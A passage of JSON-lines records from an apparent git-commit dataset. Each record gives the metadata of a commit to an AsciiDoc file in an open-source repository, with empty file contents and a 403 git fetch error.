arch,mgalushka\/elasticsearch,pranavraman\/elasticsearch,ivansun1010\/elasticsearch,NBSW\/elasticsearch,Charlesdong\/elasticsearch,areek\/elasticsearch,geidies\/elasticsearch,jchampion\/elasticsearch,jchampion\/elasticsearch,zeroctu\/elasticsearch,winstonewert\/elasticsearch,adrianbk\/elasticsearch,linglaiyao1314\/elasticsearch,vietlq\/elasticsearch,huanzhong\/elasticsearch,fekaputra\/elasticsearch,amit-shar\/elasticsearch,cnfire\/elasticsearch-1,masterweb121\/elasticsearch,acchen97\/elasticsearch,lchennup\/elasticsearch,slavau\/elasticsearch,ImpressTV\/elasticsearch,mnylen\/elasticsearch,strapdata\/elassandra5-rc,fekaputra\/elasticsearch,Brijeshrpatel9\/elasticsearch,Liziyao\/elasticsearch,drewr\/elasticsearch,ckclark\/elasticsearch,rhoml\/elasticsearch,ouyangkongtong\/elasticsearch,sdauletau\/elasticsearch,mapr\/elasticsearch,Shekharrajak\/elasticsearch,apepper\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,jeteve\/elasticsearch,Liziyao\/elasticsearch,gmarz\/elasticsearch,wittyameta\/elasticsearch,mnylen\/elasticsearch,mikemccand\/elasticsearch,jbertouch\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/histogram-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/histogram-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5fd341285c617150222b8b66a643bb56a0e0f929","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 
2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"747a216b88fbda4795ca805ea1a94c26d6597464","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7eb5907b27450d8bf11c173a60b71ee4e35afe8a","subject":"Some typos in JSON RPC API protocol","message":"Some typos in JSON RPC API protocol\n\nFix it and reformat large examples.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac89db30f7f0406d0b24d1a64e34c9012814b1d5","subject":"Create terminology_zh.adoc","message":"Create terminology_zh.adoc","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/terminology_zh.adoc","new_file":"src\/docs\/asciidoc\/jme3\/terminology_zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"776ef91b70d814433653ed363bb0c03ea5dabab6","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"140568dda3ee757ab925ad6db9e532ce8d76b479","subject":"Update 2016-02-23-Clojure-X-2015.adoc","message":"Update 
2016-02-23-Clojure-X-2015.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2016-02-23-Clojure-X-2015.adoc","new_file":"_posts\/2016-02-23-Clojure-X-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2df3ec04976e6a89d5532ba294a2cecc30d34cc","subject":"Update 2018-05-14-command64.adoc","message":"Update 2018-05-14-command64.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-14-command64.adoc","new_file":"_posts\/2018-05-14-command64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03de710c1e5d1dcf89f1001d8ec458a1c8cc3b87","subject":"Update 2018-07-11-big-thing.adoc","message":"Update 2018-07-11-big-thing.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-11-big-thing.adoc","new_file":"_posts\/2018-07-11-big-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1350b05280e07b9a9a90c90843b85b2b5bf29d9a","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f6062b824aa001493d8d2671d0c6448addb917c","subject":"Update 2017-03-14-First-Post.adoc","message":"Update 2017-03-14-First-Post.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2ac8f38850d07c167cd2dc276d674e65f054c5e","subject":"\u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u043d\u0430 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u0435 7 \u041d\u0438\u0448\u043a\u0438 \u0438 \u043c\u043d\u043e\u0433\u043e\u043d\u0438\u0448\u043a\u043e\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0438\u0440\u0430\u043d\u0435","message":"\u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u043d\u0430 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u0435 7 \u041d\u0438\u0448\u043a\u0438 \u0438 
\u043c\u043d\u043e\u0433\u043e\u043d\u0438\u0448\u043a\u043e\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0438\u0440\u0430\u043d\u0435\n","repos":"slbedu\/javase8-2016","old_file":"lab07\/README.adoc","new_file":"lab07\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e7b0aa2e162b3909ee973ced6f9d6f19d076d8f","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dad423c467ee75ea2e99d0707564fc37c66e84ac","subject":"Python notes: Calling method or function by name","message":"Python notes: Calling method or function by name\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"35d5fa8c1acbc8a8c53a014fb45ec6f939e140b6","subject":"Python note: Enum good practice","message":"Python note: Enum good practice\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d6f1855728871cc2671e3cbd03f2cbaedbc8c13a","subject":"[doc] Rewrite usage","message":"[doc] Rewrite usage\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb10b6dad745fcfb72de7a2bc99a0f34e7878197","subject":"added readme","message":"added readme\n","repos":"hivemq\/deny-wildcard-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/deny-wildcard-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1051ad555ac9ac98a41aa0efa675ce4a1d009e1c","subject":"Update README","message":"Update README\n","repos":"pjanouch\/liberty,pjanouch\/liberty","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/liberty.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"86a9a428788df1b08dc1651068d9d80fd99640d6","subject":"Add README","message":"Add README\n","repos":"mlocati\/ServicesControl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/mlocati\/ServicesControl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33460b44257c5a37d42d90ef0c6214e3038f470f","subject":"Fixed README","message":"Fixed README\n","repos":"pschalk\/camunda-bpm-custom-batch","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pschalk\/camunda-bpm-custom-batch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce0cad30833e072c43641b42b040176f3fd4abf6","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaeb2be68861b89bd942de6d76cb232120052f55","subject":"Create common-createGithubRepositoryForCI.adoc","message":"Create common-createGithubRepositoryForCI.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-createGithubRepositoryForCI.adoc","new_file":"src\/main\/docs\/common-createGithubRepositoryForCI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"022074d9154c3097aa5364acdf86e17c53b80a26","subject":"New readme.adoc for draft-docs","message":"New readme.adoc for draft-docs\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"draft-docs\/readme.adoc","new_file":"draft-docs\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a44df052b142f60d022a07cebcf788994dfa38a3","subject":"Promotion for spotify plugin ;)","message":"Promotion for spotify plugin ;)\n","repos":"bms-devs\/jdd-2015-logging-in-microservices,bms-devs\/jdd-2015-logging-in-microservices,bms-devs\/wjug-2016-logging-in-microservices,uguy\/Elasticsearch-Logstash-Kibana,uguy\/elk","old_file":"Readme.adoc","new_file":"Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bms-devs\/jdd-2015-logging-in-microservices.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c71e1e31531fd697ffec28bc2617a909befb0082","subject":"Update 2017-08-19.adoc","message":"Update 2017-08-19.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-19.adoc","new_file":"_posts\/2017-08-19.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80397e654494a6e5a7c0b5c54ed5e480719ffebb","subject":"Update 
2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","message":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebbb0c9b4c9a6770fea314bb8f91bbfc78a45835","subject":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","message":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73bfbed41e4d4afc0c5b5338e0b44fe9ba1fddcc","subject":"added readme","message":"added readme\n","repos":"sothawo\/mapjfx,sothawo\/mapjfx,sothawo\/mapjfx","old_file":"Downloads\/readme.adoc","new_file":"Downloads\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sothawo\/mapjfx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"028c0e8d7d06c419b040830de1f5c311bcc38a5d","subject":"y2b create post Zelda Skyward Sword Limited Edition Unboxing","message":"y2b create post Zelda Skyward Sword Limited Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-22-Zelda-Skyward-Sword-Limited-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-22-Zelda-Skyward-Sword-Limited-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce0b12b8ed92453b780036e00366f884111ce50","subject":"created file, added initial content","message":"created file, added initial 
content","repos":"roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/BSFMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/BSFMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"07680899e790c44ad0d41a5ceaa1cde7bd3497c4","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf19690edb4ea108a8596131f2f445cce579c4bc","subject":"y2b create post OnLive Game System Unboxing \\u0026 Overview","message":"y2b create post OnLive Game System Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-19-OnLive-Game-System-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-01-19-OnLive-Game-System-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f59b2e847f82714fabf9b60fc1a224cdc9fa213","subject":"fix mcast addr1","message":"fix mcast addr1\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_config.asciidoc","new_file":"trex_config.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6accfd9a2d46f922c53e4c39854d6c1f66648d82","subject":"Add deploy.py download instructions.","message":"Add deploy.py download instructions.\n\nAlso minor improvements to the Impala_Kudu doc section.\n\nTested:\nGenerated docs locally and inspected them in a browser.\n\nChange-Id: I901283025b1707852c0c36daa60a6221e8508166\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1045\nReviewed-by: 
Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1cfdbfac0bff5dded3a17083e75f50e8730fb44c","subject":"Update 2017-05-21-First-hubpress.adoc","message":"Update 2017-05-21-First-hubpress.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-21-First-hubpress.adoc","new_file":"_posts\/2017-05-21-First-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdeb3061fd23285400243ba78d409c8720cb3988","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4577a8fb99c3e3df3d032735cfc4e21b951764fd","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03db3a71b0b5cf98b3c3478f48d49e113b1f6ebe","subject":"Update 2016-07-15-The-Beginning.adoc","message":"Update 
2016-07-15-The-Beginning.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-07-15-The-Beginning.adoc","new_file":"_posts\/2016-07-15-The-Beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f911c1416ba5f6125da1531a49bd51ef6faf52d7","subject":"Update 2015-01-31-Things.adoc","message":"Update 2015-01-31-Things.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-Things.adoc","new_file":"_posts\/2015-01-31-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b276ee2488dd686712e827308edf2b14b11166cb","subject":"Add news item for release 2.0.0.RC2","message":"Add news item for release 2.0.0.RC2\n","repos":"levymoreira\/griffon,griffon\/griffon,griffon\/griffon,tschulte\/griffon,tschulte\/griffon,levymoreira\/griffon,levymoreira\/griffon,tschulte\/griffon","old_file":"docs\/griffon-site\/src\/jbake\/content\/news\/griffon_2.0.0.RC2.adoc","new_file":"docs\/griffon-site\/src\/jbake\/content\/news\/griffon_2.0.0.RC2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tschulte\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8593bf75fa7697f1d2a85bdfd3f442c11c86caf2","subject":"Update 2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","message":"Update 2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","new_file":"_posts\/2014-10-18-A-Quickstart-Guide-to-Frog-and-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4481c186eec51686070b62222a37e7dc4f11dffe","subject":"Update 2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","message":"Update 2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","new_file":"_posts\/2016-04-02-Microservices-in-the-Chronicle-World-Part-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3a0e910ab4f0648dbadf258e5c86309917ad3c6","subject":"add euroclojure","message":"add euroclojure\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/euroclojure.adoc","new_file":"content\/events\/2016\/euroclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
